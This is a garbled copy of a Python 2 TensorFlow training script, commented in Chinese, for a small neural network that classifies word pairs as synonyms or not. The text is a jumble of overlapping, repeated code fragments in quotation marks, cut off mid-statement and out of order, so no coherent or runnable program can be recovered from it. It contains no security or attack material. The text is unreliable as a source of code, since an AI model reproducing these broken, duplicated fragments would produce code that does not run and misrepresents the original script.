accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test =", "train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) #", "print '#' * 20 print accu print accu_test print cnt print 'Done' break", "num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1,", "ySam = yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op,", "_, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1,", "loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss)", ": ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape =", "- i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn", "yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print", "-tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction =", "correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy)", "W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000", "gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece *", "2))}) # print W1_val print '#' * 20 print 'cnt', cnt print loss_val", "W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) #", 
"W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op,", "y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss", "piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY()", "random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] #", "tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num", "= train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))})", ":] # print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], #", "as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num,", "num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 =", "import random import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num", "= tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1", "xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample", "num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in)", "# W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32)", "W1_val print '#' * 20 print 'cnt', cnt print loss_val print accu print", "= tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 +", "#划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? 
import readerX import tensorflow as tf import numpy as np import", "tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 =", "W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num,", "+ b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3", "20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1", "+ 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss", "sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577)", "yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader Done' xIn", "yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3],", "readerX import tensorflow as tf import numpy as np import random import gc", "tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in =", "#使用三层神经网进行训练,n个隐藏层和1个输出层?? 
import readerX import tensorflow as tf import numpy as np import random", "accu_test # print W_val if accu > 0.99: print '#' * 20 print", "loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val =", "in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num =", "opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000):", "dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) +", "'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam", "'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out", "= tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2),", "if accu > 0.99: print '#' * 20 print accu print accu_test print", "= tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with", "= 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32)", "tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) #", "tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary =", "# loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy", "= (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30", "2), 'bias2', dtype=tf.float32) 
Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst =", "tf import numpy as np import random import gc data_dim = 200#输入数据的维度 #", "L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2),", "= 200#输入数据的维度 # piece = 999999 # sample_num = piece * 49 xInTemp,", "is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape", "xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam", "tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out =", "train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op", "= piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i]", "as np import random import gc data_dim = 200#输入数据的维度 # piece = 999999", "= tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2),", "for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp)", "sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200))", "y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt', cnt", "W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) #", "train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training", "W_val if accu > 0.99: print '#' * 20 print accu print accu_test", "> 0.99: print '#' * 20 print accu print accu_test print cnt print", "= tf.matmul(x, W1) + b1 #L1_out = 
tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2", "b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32)", "accu print accu_test # print W_val if accu > 0.99: print '#' *", "tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32)", "= yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op, loss,", "'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out =", "num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1',", "30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num),", "dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 =", "loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y *", "num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out", "numpy as np import random import gc data_dim = 200#输入数据的维度 # piece =", "999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp =", "2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out,", "* 20 print 'cnt', cnt print loss_val print accu print accu_test # print", "# print W1_val print '#' * 20 print 'cnt', cnt print loss_val print", "# b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1", "== 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x:", "cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! 
accu =", "= tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2", "Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape =", "2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1,", "# loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss =", "opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start'", "tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 =", "(None, 2)) num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"):", "L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1,", "50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y)", "= tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss =", "tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList =", "in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam", "i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num", "data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece * 49", "y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100", "= xIn[randList, :] ySam = yIn[randList, :] # print ySam # _, loss_val,", "'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape", "with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList", "cnt print 
loss_val print accu print accu_test # print W_val if accu >", "= sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 ==", "random import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num =", "yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt', cnt print", "= -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction", "import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece", "#输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as", "Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss", "tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))", "dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out *", "np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :]", "sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 -", "= tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in", "L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) #", "L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1,", "= 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim,", "size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32,", "W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 #", "#coding:UTF-8 
#这个文件用tf实现一个单层神经网络,用来判断两个词是否是同义词 #输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import", "= tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op =", "sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0", "print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam", "# b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out =", "tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32)", "loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or(", ":] ySam = yIn[randList, :] # print ySam # _, loss_val, W_val =", "sample_num = len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp)", "'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x =", "loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))})", "# feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss,", "= train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20", "= tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2',", "num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num),", "len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print", "data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 
or( cnt < 2000 and", "tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for", "print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num],", "# print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x:", "as tf import numpy as np import random import gc data_dim = 200#输入数据的维度", "loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope:", "= tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) #", "shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num =", "= tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in", "= [[i,1 - i] for i in yInTemp] print 'Reader Done' xIn =", "print W_val if accu > 0.99: print '#' * 20 print accu print", "dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) +", "'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000", "train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt", "with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary", "print accu print accu_test # print W_val if accu > 0.99: print '#'", "b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2',", "= len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect()", "tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = 
tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in =", "#L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32)", "\"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with", "b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in)", "< 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))})", "xIn[randList, :] ySam = yIn[randList, :] # print ySam # _, loss_val, W_val", "cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x:", "scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\",", "2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!!", "inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList,", "accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1,", "== 0):#!!!!!!!!!!!在这里!!!!!!!! 
accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:],", "xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print", "del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y", "# _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y:", "for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) #", "feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3],", "_, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)})", "= tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer())", "cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print", "20 print 'cnt', cnt print loss_val print accu print accu_test # print W_val", "= tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out))", "* 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out,", "size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam", "feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt <", "piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for", "= tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out =", "50 # loss = 
tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss =", "2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#'", "x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None,", "1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared'", "+ b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2),", "'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num),", "accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' *", "W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32)", "train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session()", "= tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as", "num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1,", "xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp]", "# print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print", "tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt =", "if cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! 
accu", "Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print", "np import random import gc data_dim = 200#输入数据的维度 # piece = 999999 #", "num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out,", "rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) #", "(None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2", "W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt", "'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1)", "= L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss", "loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if", "xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam # _,", "tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss)", "with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1',", "'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3", "tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20 print num,", "ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], #", "= tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20 print", "= np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList,", "tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2',", "# inputSam = 
random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam =", "y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20", "# rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y)", "= tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in", "yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is :", "* 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i", "print loss_val print accu print accu_test # print W_val if accu > 0.99:", "print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x", "'#' * 20 print 'cnt', cnt print loss_val print accu print accu_test #", "tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 =", "yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn)", "print '#' * 20 print 'cnt', cnt print loss_val print accu print accu_test", "[[i,1 - i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp)", "inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam #", "np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 